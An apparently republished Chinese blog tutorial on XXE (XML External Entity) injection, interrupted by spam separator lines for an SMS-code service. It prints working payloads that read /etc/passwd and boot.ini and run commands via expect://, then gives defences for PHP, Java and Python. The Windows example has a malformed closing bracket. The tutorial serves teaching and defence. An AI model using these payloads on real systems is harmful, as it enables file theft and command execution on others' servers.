XXE漏洞简介以及Payload收集

Posted jiemapingtai

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了XXE漏洞简介以及Payload收集相关的知识,希望对你有一定的参考价值。

 

 

一、.漏洞简介

  1.什么是XXE漏洞。

    XXE漏洞,全称XML External Entity 漏洞,也是一种注入漏洞。原理是将自己的恶意代码输入插入到Web应用构造的XML中,Web应用如果没有对用户的输入进行有效的过滤,那么就会解析带有恶意代码的XML,从而实现攻击者的目的。

  2.XXE漏洞有什么危害

    成功利用XXE漏洞可以实现任意文件读取、SSRF、DoS,特定情况下可以实现命令执行。

_ _ _ _ _ _ _ _ __ _ _ _ _ _ _ _ __ _ _ _ _ _ _ _ __ _ _ _ _ _ _ _ __ _ _ _ _ _ _ _ _接码平台 _ __ _ _ _ _ _ _ _ __ _ _ _ _ _ _ _ __ _ _ _ _ _ _ _ __ _ _ _ _ _ _ _ __ _ _ _ _ _ _ _ _ _ __ _ _ _ _ _ _ _ _ _ __ _ _ _ _ _ _ _ _

二、怎样利用XXE漏洞

  1.文件读取:

    这里分为Windows服务器和Linux服务器两种环境。首先是Windows的代码:

    

<?xml version="1.0"?>
    <!DOCTYPE root [
    <!ENTITY % file SYSTEM "file:///c://boot.ini">
    %file;
]]>

    

    然后是Linux的代码:

    

<?xml version="1.0" encoding="ISO-8859-1"?>
    <!DOCTYPE foo [
    <!ELEMENT foo ANY >
    <!ENTITY xxe SYSTEM "file:///etc/passwd" >
    ]>
<foo>&xxe;</foo>

    可以看到都是先定义一个名为XXE的外部实体,后面接SYSTEM或者PUBLIC都可以,然后将文件名用引号括起来。注意这里的file协议后面有三个反斜杠。最后一步是在一个<foo>标签中调用之前定义的外部实体。实战中不一定是foo这个名字,可以根据实际情况进行调整。

  2.命令执行。

  之前就说过了这个需要特定情况下才行,具体的条件是:1.支持expect协议 2. php  。执行id命令代码如下:

  

<?xml version="1.0" encoding="ISO-8859-1"?>
    <!DOCTYPE ANY[
    <!ENTITY xxe SYSTEM "expect://id" >
    ]>
<foo>&xxe;</foo>

  3.Dos拒绝服务。

  这个原理是递归调用外部实体,让解析器陷入嵌套循环不能自拔,造成拒绝服务。具体代码我就不展示了。

_ _ _ _ _ _ _ _ __ _ _ _ _ _ _ _ __ _ _ _ _ _ _ _ __ _ _ _ _ _ _ _ __ _ _ _ _ _ _ _ __ _ _ _ _ _ _ _ __ _ _ _ _ _ _ _ __ _ _ _ _ _ _ _ __ _ _ _ _ _ _ _ __ _ _ _ _ 2020最新接码平台_ _ _ __ _ _ _ _ _ _ _ __ _ _ _ _ _ _ _ _

三、如何修复和防御XXE漏洞。

  XXE的漏洞其实防御起来并不难。首先按照通用防御注入的思路去防御,就是过滤用户输入的代码,可以看到实现一个XXE攻击需要的特殊字符还是挺多的,那些用户输入一般不会用到的特殊字符就是我们需要重点过滤的。例如/<>"&等。但是这些过滤一定要在不影响业务的前提下才能实行。第二种方法其实非常简单,编程语言一般都自带一个是否解析外部实体的方法,如果业务中用不到外部实体,那么就可以直接调用这个方法即可。这里以PHP、Java和Python为例写一下具体的方法:

  PHP:

libxml_disable_entity_loader(true);

  

  Java:

DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();
dbf.setExpandEntityReferences(false);

  

  Python:

from lxml import etree
xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))

  

以上是关于XXE漏洞简介以及Payload收集的主要内容,如果未能解决你的问题,请参考以下文章

漏洞经验分享丨Java审计之XXE(下)

XML (XXE) 注入Payload List

xxe漏洞复习

XSS+CSRF(+XXE)组合拳=RCE之旅

XXE漏洞

XML引用外部实体触发XXE漏洞